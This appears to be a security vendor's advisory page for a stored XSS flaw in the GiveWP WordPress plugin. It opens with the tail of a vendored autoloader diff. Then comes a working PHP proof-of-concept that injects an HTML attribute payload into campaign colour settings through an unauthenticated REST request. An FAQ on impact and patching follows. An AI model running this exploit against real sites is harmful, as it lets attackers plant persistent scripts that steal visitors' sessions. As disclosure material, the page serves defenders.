    'GiveVendorsSymfonyComponentHttpFoundationSessionAttributeNamespacedAttributeBag' => $strauss_src . '/symfony/http-foundation/Session/Attribute/NamespacedAttributeBag.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionAttributeAttributeBag' => $strauss_src . '/symfony/http-foundation/Session/Attribute/AttributeBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionFactoryInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionFactoryInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionBagInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionBagInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationRequestMatcher' => $strauss_src . '/symfony/http-foundation/RequestMatcher.php',
-   'GiveVendorsSymfonyComponentHttpFoundationUrlHelper' => $strauss_src . '/symfony/http-foundation/UrlHelper.php',
-   'GiveVendorsSymfonyComponentHttpFoundationJsonResponse' => $strauss_src . '/symfony/http-foundation/JsonResponse.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionUtils' => $strauss_src . '/symfony/http-foundation/Session/SessionUtils.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionFactory' => $strauss_src . '/symfony/http-foundation/Session/SessionFactory.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionBagProxy' => $strauss_src . '/symfony/http-foundation/Session/SessionBagProxy.php',
+   'GiveVendorsSymfonyComponentHttpFoundationServerBag' => $strauss_src . '/symfony/http-foundation/ServerBag.php',
    'GiveVendorsSymfonyComponentHttpFoundationRequestStack' => $strauss_src . '/symfony/http-foundation/RequestStack.php',
+   'GiveVendorsSymfonyComponentHttpFoundationRateLimiterRequestRateLimiterInterface' => $strauss_src . '/symfony/http-foundation/RateLimiter/RequestRateLimiterInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationRateLimiterAbstractRequestRateLimiter' => $strauss_src . '/symfony/http-foundation/RateLimiter/AbstractRequestRateLimiter.php',
    'GiveVendorsSymfonyComponentHttpFoundationHeaderBag' => $strauss_src . '/symfony/http-foundation/HeaderBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationAcceptHeaderItem' => $strauss_src . '/symfony/http-foundation/AcceptHeaderItem.php',
-   'GiveVendorsSymfonyComponentHttpFoundationParameterBag' => $strauss_src . '/symfony/http-foundation/ParameterBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationStreamedResponse' => $strauss_src . '/symfony/http-foundation/StreamedResponse.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsRedirected' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsRedirected.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHasCookie' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHasCookie.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsUnprocessable' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsUnprocessable.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseStatusCodeSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseStatusCodeSame.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHasHeader' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHasHeader.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsSuccessful' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsSuccessful.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseCookieValueSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseCookieValueSame.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintRequestAttributeValueSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/RequestAttributeValueSame.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseFormatSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseFormatSame.php',
-   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHeaderSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHeaderSame.php',
-   'GiveVendorsSymfonyComponentHttpFoundationCookie' => $strauss_src . '/symfony/http-foundation/Cookie.php',
-   'GiveVendorsSymfonyComponentHttpFoundationResponseHeaderBag' => $strauss_src . '/symfony/http-foundation/ResponseHeaderBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationRedirectResponse' => $strauss_src . '/symfony/http-foundation/RedirectResponse.php',
    'GiveVendorsSymfonyComponentHttpFoundationResponse' => $strauss_src . '/symfony/http-foundation/Response.php',
-   'GiveVendorsSymfonyComponentHttpFoundationIpUtils' => $strauss_src . '/symfony/http-foundation/IpUtils.php',
-   'GiveVendorsSymfonyComponentHttpFoundationRequestMatcherInterface' => $strauss_src . '/symfony/http-foundation/RequestMatcherInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationAcceptHeader' => $strauss_src . '/symfony/http-foundation/AcceptHeader.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileBag' => $strauss_src . '/symfony/http-foundation/FileBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionRequestExceptionInterface' => $strauss_src . '/symfony/http-foundation/Exception/RequestExceptionInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionConflictingHeadersException' => $strauss_src . '/symfony/http-foundation/Exception/ConflictingHeadersException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionSuspiciousOperationException' => $strauss_src . '/symfony/http-foundation/Exception/SuspiciousOperationException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionJsonException' => $strauss_src . '/symfony/http-foundation/Exception/JsonException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionBadRequestException' => $strauss_src . '/symfony/http-foundation/Exception/BadRequestException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationExceptionSessionNotFoundException' => $strauss_src . '/symfony/http-foundation/Exception/SessionNotFoundException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileStream' => $strauss_src . '/symfony/http-foundation/File/Stream.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileUploadedFile' => $strauss_src . '/symfony/http-foundation/File/UploadedFile.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileFile' => $strauss_src . '/symfony/http-foundation/File/File.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFileNotFoundException' => $strauss_src . '/symfony/http-foundation/File/Exception/FileNotFoundException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionCannotWriteFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/CannotWriteFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionUnexpectedTypeException' => $strauss_src . '/symfony/http-foundation/File/Exception/UnexpectedTypeException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/FileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionExtensionFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/ExtensionFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionNoTmpDirFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/NoTmpDirFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionPartialFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/PartialFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionAccessDeniedException' => $strauss_src . '/symfony/http-foundation/File/Exception/AccessDeniedException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionNoFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/NoFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionUploadException' => $strauss_src . '/symfony/http-foundation/File/Exception/UploadException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionIniSizeFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/IniSizeFileException.php',
-   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFormSizeFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/FormSizeFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationInputBag' => $strauss_src . '/symfony/http-foundation/InputBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationRedirectResponse' => $strauss_src . '/symfony/http-foundation/RedirectResponse.php',
    'GiveVendorsSymfonyComponentHttpFoundationRequest' => $strauss_src . '/symfony/http-foundation/Request.php',
-   'GiveVendorsSymfonyComponentHttpFoundationServerBag' => $strauss_src . '/symfony/http-foundation/ServerBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationBinaryFileResponse' => $strauss_src . '/symfony/http-foundation/BinaryFileResponse.php',
-   'GiveVendorsStellarWPContainerContractContainerInterface' => $strauss_src . '/stellarwp/container-contract/src/ContainerInterface.php',
-   'GiveVendorsStellarWPAdminNoticesDataTransferObjectsNoticeElementProperties' => $strauss_src . '/stellarwp/admin-notices/src/DataTransferObjects/NoticeElementProperties.php',
-   'GiveVendorsStellarWPAdminNoticesAdminNotice' => $strauss_src . '/stellarwp/admin-notices/src/AdminNotice.php',
-   'GiveVendorsStellarWPAdminNoticesExceptionsNotificationCollisionException' => $strauss_src . '/stellarwp/admin-notices/src/Exceptions/NotificationCollisionException.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsNoticeUrgency' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/NoticeUrgency.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsNoticeLocation' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/NoticeLocation.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsScreenCondition' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/ScreenCondition.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsUserCapability' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/UserCapability.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsScript' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/Script.php',
-   'GiveVendorsStellarWPAdminNoticesValueObjectsStyle' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/Style.php',
-   'GiveVendorsStellarWPAdminNoticesAdminNotices' => $strauss_src . '/stellarwp/admin-notices/src/AdminNotices.php',
-   'GiveVendorsStellarWPAdminNoticesTraitsHasNamespace' => $strauss_src . '/stellarwp/admin-notices/src/Traits/HasNamespace.php',
-   'GiveVendorsStellarWPAdminNoticesNotificationsRegistrar' => $strauss_src . '/stellarwp/admin-notices/src/NotificationsRegistrar.php',
-   'GiveVendorsStellarWPAdminNoticesActionsNoticeShouldRender' => $strauss_src . '/stellarwp/admin-notices/src/Actions/NoticeShouldRender.php',
-   'GiveVendorsStellarWPAdminNoticesActionsRenderAdminNotice' => $strauss_src . '/stellarwp/admin-notices/src/Actions/RenderAdminNotice.php',
-   'GiveVendorsStellarWPAdminNoticesActionsEnqueueNoticesScriptsAndStyles' => $strauss_src . '/stellarwp/admin-notices/src/Actions/EnqueueNoticesScriptsAndStyles.php',
-   'GiveVendorsStellarWPAdminNoticesActionsDisplayNoticesInAdmin' => $strauss_src . '/stellarwp/admin-notices/src/Actions/DisplayNoticesInAdmin.php',
-   'GiveVendorsStellarWPAdminNoticesContractsNotificationsRegistrarInterface' => $strauss_src . '/stellarwp/admin-notices/src/Contracts/NotificationsRegistrarInterface.php',
-   'GiveVendorsStellarWPFieldConditionsComplexConditionSet' => $strauss_src . '/stellarwp/field-conditions/src/ComplexConditionSet.php',
-   'GiveVendorsStellarWPFieldConditionsNestedCondition' => $strauss_src . '/stellarwp/field-conditions/src/NestedCondition.php',
-   'GiveVendorsStellarWPFieldConditionsSimpleConditionSet' => $strauss_src . '/stellarwp/field-conditions/src/SimpleConditionSet.php',
-   'GiveVendorsStellarWPFieldConditionsConfig' => $strauss_src . '/stellarwp/field-conditions/src/Config.php',
-   'GiveVendorsStellarWPFieldConditionsContractsCondition' => $strauss_src . '/stellarwp/field-conditions/src/Contracts/Condition.php',
+   'GiveVendorsSymfonyComponentHttpFoundationAcceptHeader' => $strauss_src . '/symfony/http-foundation/AcceptHeader.php',
+   'GiveVendorsStellarWPArraysArr' => $strauss_src . '/stellarwp/arrays/src/Arrays/Arr.php',
    'GiveVendorsStellarWPFieldConditionsContractsConditionSet' => $strauss_src . '/stellarwp/field-conditions/src/Contracts/ConditionSet.php',
+   'GiveVendorsStellarWPFieldConditionsContractsCondition' => $strauss_src . '/stellarwp/field-conditions/src/Contracts/Condition.php',
+   'GiveVendorsStellarWPFieldConditionsConfig' => $strauss_src . '/stellarwp/field-conditions/src/Config.php',
+   'GiveVendorsStellarWPFieldConditionsSimpleConditionSet' => $strauss_src . '/stellarwp/field-conditions/src/SimpleConditionSet.php',
    'GiveVendorsStellarWPFieldConditionsFieldCondition' => $strauss_src . '/stellarwp/field-conditions/src/FieldCondition.php',
+   'GiveVendorsStellarWPFieldConditionsNestedCondition' => $strauss_src . '/stellarwp/field-conditions/src/NestedCondition.php',
+   'GiveVendorsStellarWPFieldConditionsComplexConditionSet' => $strauss_src . '/stellarwp/field-conditions/src/ComplexConditionSet.php',
    'GiveVendorsStellarWPFieldConditionsConcernsHasConditions' => $strauss_src . '/stellarwp/field-conditions/src/Concerns/HasConditions.php',
    'GiveVendorsStellarWPFieldConditionsConcernsHasLogicalOperator' => $strauss_src . '/stellarwp/field-conditions/src/Concerns/HasLogicalOperator.php',
-   'GiveVendorsStellarWPValidationExceptionsValidationException' => $strauss_src . '/stellarwp/validation/src/Exceptions/ValidationException.php',
-   'GiveVendorsStellarWPValidationExceptionsContractsValidationExceptionInterface' => $strauss_src . '/stellarwp/validation/src/Exceptions/Contracts/ValidationExceptionInterface.php',
-   'GiveVendorsStellarWPValidationServiceProvider' => $strauss_src . '/stellarwp/validation/src/ServiceProvider.php',
-   'GiveVendorsStellarWPValidationValidationRulesRegistrar' => $strauss_src . '/stellarwp/validation/src/ValidationRulesRegistrar.php',
-   'GiveVendorsStellarWPValidationValidator' => $strauss_src . '/stellarwp/validation/src/Validator.php',
-   'GiveVendorsStellarWPValidationCommandsSkipValidationRules' => $strauss_src . '/stellarwp/validation/src/Commands/SkipValidationRules.php',
-   'GiveVendorsStellarWPValidationCommandsExcludeValue' => $strauss_src . '/stellarwp/validation/src/Commands/ExcludeValue.php',
-   'GiveVendorsStellarWPValidationConfig' => $strauss_src . '/stellarwp/validation/src/Config.php',
-   'GiveVendorsStellarWPValidationValidationRuleSet' => $strauss_src . '/stellarwp/validation/src/ValidationRuleSet.php',
+   'GiveVendorsStellarWPContainerContractContainerInterface' => $strauss_src . '/stellarwp/container-contract/src/ContainerInterface.php',
    'GiveVendorsStellarWPValidationContractsValidatesOnFrontEnd' => $strauss_src . '/stellarwp/validation/src/Contracts/ValidatesOnFrontEnd.php',
    'GiveVendorsStellarWPValidationContractsSanitizer' => $strauss_src . '/stellarwp/validation/src/Contracts/Sanitizer.php',
    'GiveVendorsStellarWPValidationContractsValidationRule' => $strauss_src . '/stellarwp/validation/src/Contracts/ValidationRule.php',
-   'GiveVendorsStellarWPValidationRulesOptionalUnless' => $strauss_src . '/stellarwp/validation/src/Rules/OptionalUnless.php',
-   'GiveVendorsStellarWPValidationRulesCurrency' => $strauss_src . '/stellarwp/validation/src/Rules/Currency.php',
+   'GiveVendorsStellarWPValidationValidator' => $strauss_src . '/stellarwp/validation/src/Validator.php',
+   'GiveVendorsStellarWPValidationCommandsSkipValidationRules' => $strauss_src . '/stellarwp/validation/src/Commands/SkipValidationRules.php',
+   'GiveVendorsStellarWPValidationCommandsExcludeValue' => $strauss_src . '/stellarwp/validation/src/Commands/ExcludeValue.php',
+   'GiveVendorsStellarWPValidationServiceProvider' => $strauss_src . '/stellarwp/validation/src/ServiceProvider.php',
+   'GiveVendorsStellarWPValidationRulesEmail' => $strauss_src . '/stellarwp/validation/src/Rules/Email.php',
    'GiveVendorsStellarWPValidationRulesInteger' => $strauss_src . '/stellarwp/validation/src/Rules/Integer.php',
-   'GiveVendorsStellarWPValidationRulesOptional' => $strauss_src . '/stellarwp/validation/src/Rules/Optional.php',
-   'GiveVendorsStellarWPValidationRulesNullable' => $strauss_src . '/stellarwp/validation/src/Rules/Nullable.php',
-   'GiveVendorsStellarWPValidationRulesBoolean' => $strauss_src . '/stellarwp/validation/src/Rules/Boolean.php',
+   'GiveVendorsStellarWPValidationRulesExclude' => $strauss_src . '/stellarwp/validation/src/Rules/Exclude.php',
    'GiveVendorsStellarWPValidationRulesMin' => $strauss_src . '/stellarwp/validation/src/Rules/Min.php',
-   'GiveVendorsStellarWPValidationRulesRequired' => $strauss_src . '/stellarwp/validation/src/Rules/Required.php',
-   'GiveVendorsStellarWPValidationRulesExcludeUnless' => $strauss_src . '/stellarwp/validation/src/Rules/ExcludeUnless.php',
-   'GiveVendorsStellarWPValidationRulesSize' => $strauss_src . '/stellarwp/validation/src/Rules/Size.php',
-   'GiveVendorsStellarWPValidationRulesOptionalIf' => $strauss_src . '/stellarwp/validation/src/Rules/OptionalIf.php',
-   'GiveVendorsStellarWPValidationRulesAbstractsConditionalRule' => $strauss_src . '/stellarwp/validation/src/Rules/Abstracts/ConditionalRule.php',
-   'GiveVendorsStellarWPValidationRulesNumeric' => $strauss_src . '/stellarwp/validation/src/Rules/Numeric.php',
-   'GiveVendorsStellarWPValidationRulesInStrict' => $strauss_src . '/stellarwp/validation/src/Rules/InStrict.php',
-   'GiveVendorsStellarWPValidationRulesEmail' => $strauss_src . '/stellarwp/validation/src/Rules/Email.php',
+   'GiveVendorsStellarWPValidationRulesExcludeIf' => $strauss_src . '/stellarwp/validation/src/Rules/ExcludeIf.php',
    'GiveVendorsStellarWPValidationRulesDateTime' => $strauss_src . '/stellarwp/validation/src/Rules/DateTime.php',
-   'GiveVendorsStellarWPValidationRulesNullableUnless' => $strauss_src . '/stellarwp/validation/src/Rules/NullableUnless.php',
    'GiveVendorsStellarWPValidationRulesNullableIf' => $strauss_src . '/stellarwp/validation/src/Rules/NullableIf.php',
+   'GiveVendorsStellarWPValidationRulesOptionalIf' => $strauss_src . '/stellarwp/validation/src/Rules/OptionalIf.php',
+   'GiveVendorsStellarWPValidationRulesBoolean' => $strauss_src . '/stellarwp/validation/src/Rules/Boolean.php',
    'GiveVendorsStellarWPValidationRulesMax' => $strauss_src . '/stellarwp/validation/src/Rules/Max.php',
+   'GiveVendorsStellarWPValidationRulesAbstractsConditionalRule' => $strauss_src . '/stellarwp/validation/src/Rules/Abstracts/ConditionalRule.php',
    'GiveVendorsStellarWPValidationRulesIn' => $strauss_src . '/stellarwp/validation/src/Rules/In.php',
-   'GiveVendorsStellarWPValidationRulesExclude' => $strauss_src . '/stellarwp/validation/src/Rules/Exclude.php',
-   'GiveVendorsStellarWPValidationRulesExcludeIf' => $strauss_src . '/stellarwp/validation/src/Rules/ExcludeIf.php',
+   'GiveVendorsStellarWPValidationRulesRequired' => $strauss_src . '/stellarwp/validation/src/Rules/Required.php',
+   'GiveVendorsStellarWPValidationRulesCurrency' => $strauss_src . '/stellarwp/validation/src/Rules/Currency.php',
+   'GiveVendorsStellarWPValidationRulesOptionalUnless' => $strauss_src . '/stellarwp/validation/src/Rules/OptionalUnless.php',
+   'GiveVendorsStellarWPValidationRulesNullable' => $strauss_src . '/stellarwp/validation/src/Rules/Nullable.php',
+   'GiveVendorsStellarWPValidationRulesExcludeUnless' => $strauss_src . '/stellarwp/validation/src/Rules/ExcludeUnless.php',
+   'GiveVendorsStellarWPValidationRulesNullableUnless' => $strauss_src . '/stellarwp/validation/src/Rules/NullableUnless.php',
+   'GiveVendorsStellarWPValidationRulesInStrict' => $strauss_src . '/stellarwp/validation/src/Rules/InStrict.php',
+   'GiveVendorsStellarWPValidationRulesOptional' => $strauss_src . '/stellarwp/validation/src/Rules/Optional.php',
+   'GiveVendorsStellarWPValidationRulesNumeric' => $strauss_src . '/stellarwp/validation/src/Rules/Numeric.php',
+   'GiveVendorsStellarWPValidationRulesSize' => $strauss_src . '/stellarwp/validation/src/Rules/Size.php',
+   'GiveVendorsStellarWPValidationConfig' => $strauss_src . '/stellarwp/validation/src/Config.php',
+   'GiveVendorsStellarWPValidationValidationRulesRegistrar' => $strauss_src . '/stellarwp/validation/src/ValidationRulesRegistrar.php',
+   'GiveVendorsStellarWPValidationExceptionsContractsValidationExceptionInterface' => $strauss_src . '/stellarwp/validation/src/Exceptions/Contracts/ValidationExceptionInterface.php',
+   'GiveVendorsStellarWPValidationExceptionsValidationException' => $strauss_src . '/stellarwp/validation/src/Exceptions/ValidationException.php',
+   'GiveVendorsStellarWPValidationValidationRuleSet' => $strauss_src . '/stellarwp/validation/src/ValidationRuleSet.php',
    'GiveVendorsStellarWPValidationConcernsHasValidationRules' => $strauss_src . '/stellarwp/validation/src/Concerns/HasValidationRules.php',
-   'GiveVendorsStellarWPArraysArr' => $strauss_src . '/stellarwp/arrays/src/Arrays/Arr.php',
+   'GiveVendorsStellarWPAdminNoticesContractsNotificationsRegistrarInterface' => $strauss_src . '/stellarwp/admin-notices/src/Contracts/NotificationsRegistrarInterface.php',
+   'GiveVendorsStellarWPAdminNoticesTraitsHasNamespace' => $strauss_src . '/stellarwp/admin-notices/src/Traits/HasNamespace.php',
+   'GiveVendorsStellarWPAdminNoticesDataTransferObjectsNoticeElementProperties' => $strauss_src . '/stellarwp/admin-notices/src/DataTransferObjects/NoticeElementProperties.php',
+   'GiveVendorsStellarWPAdminNoticesAdminNotice' => $strauss_src . '/stellarwp/admin-notices/src/AdminNotice.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsStyle' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/Style.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsScreenCondition' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/ScreenCondition.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsUserCapability' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/UserCapability.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsScript' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/Script.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsNoticeUrgency' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/NoticeUrgency.php',
+   'GiveVendorsStellarWPAdminNoticesValueObjectsNoticeLocation' => $strauss_src . '/stellarwp/admin-notices/src/ValueObjects/NoticeLocation.php',
+   'GiveVendorsStellarWPAdminNoticesNotificationsRegistrar' => $strauss_src . '/stellarwp/admin-notices/src/NotificationsRegistrar.php',
+   'GiveVendorsStellarWPAdminNoticesActionsDisplayNoticesInAdmin' => $strauss_src . '/stellarwp/admin-notices/src/Actions/DisplayNoticesInAdmin.php',
+   'GiveVendorsStellarWPAdminNoticesActionsEnqueueNoticesScriptsAndStyles' => $strauss_src . '/stellarwp/admin-notices/src/Actions/EnqueueNoticesScriptsAndStyles.php',
+   'GiveVendorsStellarWPAdminNoticesActionsRenderAdminNotice' => $strauss_src . '/stellarwp/admin-notices/src/Actions/RenderAdminNotice.php',
+   'GiveVendorsStellarWPAdminNoticesActionsNoticeShouldRender' => $strauss_src . '/stellarwp/admin-notices/src/Actions/NoticeShouldRender.php',
+   'GiveVendorsStellarWPAdminNoticesExceptionsNotificationCollisionException' => $strauss_src . '/stellarwp/admin-notices/src/Exceptions/NotificationCollisionException.php',
+   'GiveVendorsStellarWPAdminNoticesAdminNotices' => $strauss_src . '/stellarwp/admin-notices/src/AdminNotices.php',
 );
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42678 - GiveWP <= 4.14.5 - Unauthenticated Stored XSS via Campaign Colors

// Configuration - change these to match your target
$target_url = 'http://example.com'; // WordPress site with GiveWP <= 4.14.5
$campaign_id = 1; // An existing campaign ID (can be discovered via /wp-json/give/v3/campaigns)

// The XSS payload to inject - uses a benign alert for demonstration
$payload = '#ff0000" onfocus="alert(1)" autofocus="true';

// REST API endpoint to update campaign settings (no authentication required in vulnerable version)
$endpoint = $target_url . '/wp-json/give/v3/campaigns/' . $campaign_id;

// Build the request body - inject the payload into primaryColor or secondaryColor
$body = json_encode([
    'primaryColor' => $payload,
    'secondaryColor' => '#f49420'
]);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'PUT');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Content-Length: ' . strlen($body)
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL error: ' . curl_error($ch) . PHP_EOL;
    exit(1);
}

curl_close($ch);

// Display results
echo '[*] CVE-2026-42678 Exploit Attempt' . PHP_EOL;
echo '[*] Target: ' . $target_url . PHP_EOL;
echo '[*] Campaign ID: ' . $campaign_id . PHP_EOL;
echo '[*] Payload: ' . $payload . PHP_EOL;
echo '[*] HTTP Status: ' . $http_code . PHP_EOL;

if ($http_code == 200) {
    echo '[+] Exploit succeeded! The payload has been stored.' . PHP_EOL;
    echo '[+] Visit the donation form page to trigger the XSS.' . PHP_EOL;
    echo '    URL: ' . $target_url . '/donation-form/' . $campaign_id . PHP_EOL;
} else {
    echo '[-] Exploit may have failed (HTTP ' . $http_code . ').' . PHP_EOL;
    echo '    Response body: ' . substr($response, 0, 500) . PHP_EOL;
}

Frequently Asked Questions

What is CVE-2026-42678?
Understanding the vulnerability
CVE-2026-42678 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the GiveWP donation plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts into donation form pages, which execute in the context of any user accessing those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization of campaign color values in the GiveWP plugin. Attackers can send crafted payloads through the REST API to update campaign settings, which are then stored in the database and executed when users view the affected donation forms.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the GiveWP plugin version 4.14.5 or earlier is vulnerable to CVE-2026-42678. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, verify the version of the GiveWP plugin installed. If it is version 4.14.5 or earlier, your site is at risk and should be updated immediately.
What should I do to fix this vulnerability?
Recommended actions
To mitigate CVE-2026-42678, update the GiveWP plugin to version 4.14.6 or later, which includes patches for this vulnerability. Regularly check for updates to ensure your plugins are secure.
What is the risk level associated with this vulnerability?
Understanding the CVSS score
The vulnerability has a CVSS score of 7.2, indicating a high severity. This means successful exploitation could allow attackers to perform actions such as stealing cookies, redirecting users, or executing scripts in the context of logged-in users.
What are the practical implications of this vulnerability?
Potential impact on users
If exploited, this vulnerability could lead to significant security breaches, including data theft and unauthorized actions on behalf of users. The stored nature of the XSS means that the malicious script persists until removed, affecting all visitors to the affected page.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an attacker can use a crafted payload to update campaign color settings via the REST API. This demonstrates the ease with which an attacker can exploit the vulnerability without authentication.
What are the specific code areas impacted by this vulnerability?
Technical details of the flaw
The vulnerability exists in the FormSettings.php and DonationFormViewModel.php files of the GiveWP plugin. Specifically, the primaryColor and secondaryColor properties are assigned directly from user input without proper validation or sanitization.
What measures can I take to further secure my WordPress site?
Best practices for security
In addition to updating vulnerable plugins, implement security best practices such as regular backups, using security plugins, and monitoring for unusual activity. Ensure that all software, including WordPress core, themes, and other plugins, are kept up to date.
How can I report a vulnerability I discover?
Responsible disclosure process
If you discover a new vulnerability, report it responsibly to the plugin developers or through a dedicated vulnerability disclosure platform. Providing detailed information about the issue can help developers create timely patches.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the GiveWP plugin temporarily until a secure version can be installed. Additionally, review user permissions and access controls to limit potential exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations